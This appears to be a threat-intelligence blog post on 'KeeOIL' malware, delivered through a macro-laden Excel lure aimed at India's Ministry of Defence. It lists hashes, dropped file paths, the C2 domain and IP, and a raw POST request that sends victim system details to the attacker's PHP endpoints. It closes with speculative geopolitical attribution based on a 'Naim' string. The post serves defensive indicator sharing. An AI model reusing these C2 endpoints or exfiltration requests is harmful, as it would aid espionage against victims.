India’s has the second largest troops for the United Nations Peacekeepers, so the theme is effective when targetting India’s Ministry of Defence. The malicious excel document leverages malicious macro to drop a few files on the victim’s computer. The macro method allows the malware to work on later and newer versions of Microsoft Office.
UNITED_NATIONS_MILITARY_OBSERVERS____COURSE___UNMOC-19_.xls
7fa6689ec0a8863e5084d30de4b9b252
After the malicious Excel file is opened the following KeeOIL files are dropped on the victim’s computer:
C:\Users\admin\Documents\hadram.exe (801f94bedb9481fb65709457c1f4c47a) C:\Users\admin\Documents\hadram.zip (0f3488c89f4f519ceba2c97e83d12af2) C:\ProgramData\ekeoil\ekeoil.exe (ab68db5c97f9ee12ca29c1eed881781d) C:\Users\All Users\ekeoil\ekeoil.exe (ab68db5c97f9ee12ca29c1eed881781d)
Connection Test
Before connecting to the C2 the malware performs some connection test and the first query is sent to:
Host: www.google.com User-Agent: google/dance
Then the second test is made to:
quora.com (**The ekeoil.exe has a string referenced "https://www.quora.com/If-programming-languages-had-honest-slogans-what-would-they-be"**)
After the connection is successfully tested the KeeOIL malware connects to its C2:
Host: firebasebox.com IP: 157.230.112.219 GET firebasebox.com/tootie292/reboshw/c0_nCussi0N.php User-Agent: ekeoil/3.1.1.5
The KeeOIL malware will drop 2 XML files containing username and password so files can be “POST” to the C2.
C:\ProgramData\ekeoil\ekeoil.xml C:\Users\All Users\ekeoil\ekeoil.xml
The XML files contain the username and password needed to communicate to the C2
The KeeOIL malware will POST the victim’s computer information from their computer name, IP Address, running processes, and other information. KeeOIL will POST the information to the C2 server on two separate PHP files depending on what needs to be posted.
Computer Name, OS Type, IP Address will be posted to:
firebasebox.com/tootie292/reboshw/1Inter-view_Call.php
POST http://firebasebox.com/tootie292/reboshw/1Inter-view_Call.php USERNAME=WindowsUser-None-5360-Ver3.1.1.4&TOKEN=DUglBQTl1_cavzqNBTuuJQ%3d%3d&ComputerName=WIN-XXYYZZ8Q89R&Caption_OperatingSystem=Microsoft+Windows+7+Professional+&LocalIp=192.168.160.1&type=PC&Version=3.1.1.5HTTP/1.1 200 OK
Running processes will be posted to:
http://firebasebox.com/tootie292/reboshw/iLln_Ess_is_0k.php
Geopolitical Note regarding India as of February 2019 and “Mr. Naim”
India is not a popular country in the region especially with the two border sharing opponents China and Pakistan who have been known to pursue cyber espionage activities against India, and likewise, India does the same cyber espionage activities as well.
The Afghan Peace Process engaged between America, and the Taliban has a significant impact on India. A potential agreement between America and the Taliban will make India as a major loser in that scenario. India has been working with the Afghan government to counter Pakistan since the nearly two-decade war began and Pakistan sees the peace process as a way to remove its troop from the western border of Afghanistan (for counterinsurgency missions) and put those troops on their eastern border against India its arch nemesis.
A string caught our attention on “hadram.exe” the string was “}Naim”. Naim is a very popular Arabic name and that name is extremely popular in Pakistan.
Something went wrong with the twitter.